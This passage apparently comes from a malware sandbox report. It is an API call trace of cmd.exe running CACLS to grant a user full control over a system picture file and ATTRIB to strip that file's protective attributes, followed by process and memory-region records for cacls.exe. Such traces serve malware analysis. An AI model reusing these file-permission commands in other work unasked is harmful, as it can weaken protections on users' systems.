lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f62c | 
out: lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x400ae8 [0182.972] FindClose (in: hFindFile=0x400ae8 | out: hFindFile=0x400ae8) returned 1 [0182.972] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.972] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0182.972] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0182.973] GetEnvironmentStringsW () returned 0x400308* [0182.973] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.973] GetConsoleOutputCP () returned 0x1b5 [0182.973] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.973] GetUserDefaultLCID () returned 0x409 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="1") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0182.974] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0182.974] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.975] GetConsoleTitleW (in: lpConsoleTitle=0x3f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0182.976] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0182.977] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0182.977] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0182.977] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0182.977] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0182.977] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0182.977] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0182.977] _wcsicmp (_String1="REM", 
_String2="CACLS") returned 15 [0182.977] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0182.980] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0182.980] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0182.980] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0182.980] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0182.980] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0182.980] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0182.980] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0182.983] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.983] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.983] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.983] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.983] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.983] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.984] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0182.984] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.984] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.984] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.984] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.984] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0182.984] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.984] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.984] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.984] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.984] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.984] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.984] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.984] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.984] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.984] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.984] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.984] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.984] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.984] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.984] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.984] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0182.985] _wcsicmp 
(_String1="CACLS", _String2="CD") returned -3 [0182.985] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0182.985] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0182.985] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0182.985] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0182.985] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0182.985] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0182.985] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0182.985] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0182.985] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0182.985] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0182.985] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0182.985] 
_wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0182.985] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0182.985] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0182.986] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0182.986] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0182.986] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0182.986] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0182.986] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0182.986] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0182.986] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0182.986] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0182.986] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0182.986] SetErrorMode (uMode=0x0) returned 0x0 [0182.986] SetErrorMode (uMode=0x1) returned 0x0 [0182.986] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x401e98, lpFilePart=0x20f1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f1a4*="Desktop") returned 0x18 [0182.986] SetErrorMode (uMode=0x0) returned 0x1 [0182.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.987] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.993] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.994] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.994] GetLastError () returned 0x2 [0182.994] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.994] GetLastError () returned 0x2 [0182.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x402180 [0182.994] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0182.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0182.995] GetLastError () returned 0x2 [0182.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x402180 [0182.995] FindClose (in: hFindFile=0x402180 | out: hFindFile=0x402180) returned 1 [0182.995] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.995] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.995] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.995] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0182.995] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0182.995] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.995] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.997] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f348*(hProcess=0x50, hThread=0x4c, dwProcessId=0xeac, dwThreadId=0xe3c)) returned 1 [0183.000] CloseHandle (hObject=0x4c) returned 1 [0183.000] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.000] GetEnvironmentStringsW () returned 0x400308* [0183.000] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0183.000] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0183.043] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0183.043] CloseHandle (hObject=0x50) returned 1 [0183.044] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0183.044] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.044] GetEnvironmentStringsW () returned 0x402410* [0183.044] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.044] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.044] GetEnvironmentStringsW () returned 0x402410* [0183.044] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.044] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0183.044] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.045] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.045] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.045] GetLastError () returned 0x2 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.045] GetLastError () returned 0x2 [0183.045] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x3fe4d8 [0183.045] 
FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0183.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0xffffffff [0183.046] GetLastError () returned 0x2 [0183.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ef20) returned 0x3fe4d8 [0183.046] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0183.046] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.046] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.046] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0183.046] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0183.046] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.046] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.046] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessInformation=0x20f348*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe4c, dwThreadId=0xf50)) returned 1 [0183.048] CloseHandle (hObject=0x50) returned 1 [0183.048] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.048] GetEnvironmentStringsW () returned 0x402410* [0183.049] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.049] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.089] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0183.089] CloseHandle (hObject=0x4c) returned 1 [0183.089] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0183.089] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.089] GetEnvironmentStringsW () returned 0x402410* [0183.090] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.090] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.090] GetEnvironmentStringsW () returned 0x402410* [0183.090] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0183.090] DeleteProcThreadAttributeList (in: 
lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0183.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.090] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.090] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.090] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.090] SetConsoleInputExeNameW () returned 0x1 [0183.090] GetConsoleOutputCP () returned 0x1b5 [0183.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.090] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.091] exit (_Code=0) Process: id = "353" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0xd9c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25874 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25875 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25876 start_va = 0x40000 end_va = 0x40fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25877 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25878 start_va = 0x4b0000 end_va = 0x4b8fff entry_point = 0x4b0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25879 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25880 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25881 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25882 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25883 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25884 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25885 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25886 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25887 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 
